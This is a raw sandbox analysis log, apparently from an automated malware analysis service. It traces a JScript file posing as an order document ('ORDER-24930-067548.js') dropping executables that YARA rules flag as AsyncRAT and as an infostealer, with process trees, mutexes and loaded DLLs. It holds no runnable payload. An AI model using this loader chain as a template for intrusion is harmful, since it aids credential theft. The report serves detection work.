Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 5_2_07CF03CD 5_2_07CF03CD
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 5_2_07CF6329 5_2_07CF6329
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 5_2_07CFD600 5_2_07CFD600
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 5_2_07CFD5F1 5_2_07CFD5F1
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 5_2_07CF458B 5_2_07CF458B
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 5_2_07CFCCDF 5_2_07CFCCDF
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 5_2_07CF7070 5_2_07CF7070
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 5_2_07D10BB8 5_2_07D10BB8
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 7_2_05180D32 7_2_05180D32
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 7_2_05186450 7_2_05186450
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 7_2_051843D0 7_2_051843D0
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 7_2_05185208 7_2_05185208
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 7_2_05187288 7_2_05187288
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 7_2_05187279 7_2_05187279
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 8_2_031213B8 8_2_031213B8
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 9_2_010713B8 9_2_010713B8
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 10_2_02C613B8 10_2_02C613B8
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 12_2_00F313B8 12_2_00F313B8
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 13_2_02D87288 13_2_02D87288
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 13_2_02D85208 13_2_02D85208
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 13_2_02D843D0 13_2_02D843D0
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 13_2_02D86450 13_2_02D86450
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 13_2_02D80D32 13_2_02D80D32
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 13_2_02D87284 13_2_02D87284
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 13_2_02D87279 13_2_02D87279
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 13_2_02D8727C 13_2_02D8727C
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 14_2_026913C3 14_2_026913C3
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 15_2_00C113B8 15_2_00C113B8
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 17_2_00BC13B8 17_2_00BC13B8
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 19_2_00C57288 19_2_00C57288
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 19_2_00C55213 19_2_00C55213
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 19_2_00C543D0 19_2_00C543D0
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 19_2_00C56450 19_2_00C56450
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 19_2_00C50D33 19_2_00C50D33
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 19_2_00C5727C 19_2_00C5727C
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 20_2_021313B8 20_2_021313B8
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 21_2_00B613B8 21_2_00B613B8
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 22_2_027B13C3 22_2_027B13C3
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 23_2_00A713B8 23_2_00A713B8
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 24_2_012F13B8 24_2_012F13B8
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 25_2_00827288 25_2_00827288
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 25_2_00825212 25_2_00825212
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 25_2_008243D0 25_2_008243D0
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 25_2_00826450 25_2_00826450
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 25_2_00820D32 25_2_00820D32
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 25_2_008261C8 25_2_008261C8
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 25_2_00827279 25_2_00827279
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 26_2_021613B8 26_2_021613B8
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 27_2_00F613B8 27_2_00F613B8
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 29_2_016913ED 29_2_016913ED
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 30_2_025713B8 30_2_025713B8
Yara signature match
Source: 13.2.Service.exe.2e1383c.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 13.2.Service.exe.2dfd39c.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 13.2.Service.exe.2e085e0.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.2.GeUT.exe.2b17ffc.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 8.2.GeUT.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.2.GeUT.exe.2b163a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.2.GeUT.exe.2b14768.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 7.2.GeUT.exe.2d16a3c.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 5.2.GeUT.exe.78e0000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 5.2.GeUT.exe.78e0000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 13.2.Service.exe.2e1383c.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 7.2.GeUT.exe.2d14df8.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 7.2.GeUT.exe.2d18698.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 13.2.Service.exe.2e085e0.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 13.2.Service.exe.2dfd39c.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000008.00000002.1656591343.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000004.00000002.1507678117.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000005.00000002.2754958670.00000000078E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000007.00000002.1632367681.0000000002CF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000D.00000002.1706268974.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: GeUT.exe.3.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Service.exe.4.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: GeUT.exe.3.dr, Program.cs Cryptographic APIs: 'CreateDecryptor'
Source: 3.2.wscript.exe.1ef379d70e0.1.raw.unpack, Program.cs Cryptographic APIs: 'CreateDecryptor'
Source: 3.3.wscript.exe.1ef34fd67e0.0.raw.unpack, Program.cs Cryptographic APIs: 'CreateDecryptor'
Source: Service.exe.4.dr, Program.cs Cryptographic APIs: 'CreateDecryptor'
Source: classification engine Classification label: mal100.troj.spyw.evad.winJS@52/22@0/2
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\cc[1].js Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe Mutant created: NULL
Source: C:\Windows\System32\wbem\WMIADAP.exe Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex
Source: C:\Windows\System32\wbem\WMIADAP.exe Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Flag
Source: C:\Windows\System32\wbem\WMIADAP.exe Mutant created: \BaseNamedObjects\Global\ADAP_WMI_ENTRY
Source: C:\Windows\System32\wbem\WMIADAP.exe Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Lib
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Mutant created: \Sessions\1\BaseNamedObjects\wtYmVE2WY2XGhWlO
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\OLWJMU.js Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: tmp5FA4.tmp.dat.5.dr, tmp4638.tmp.dat.5.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: ORDER-24930-067548.js Virustotal: Detection: 30%
Source: ORDER-24930-067548.js ReversingLabs: Detection: 26%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ORDER-24930-067548.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\OLWJMU.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process created: C:\Windows\System32\wbem\WMIADAP.exe wmiadap.exe /F /T /R
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\OLWJMU.js" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msxml3.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msdart.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dlnashext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wpdshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msxml3.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msdart.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: sspicli.dll Jump to behavior
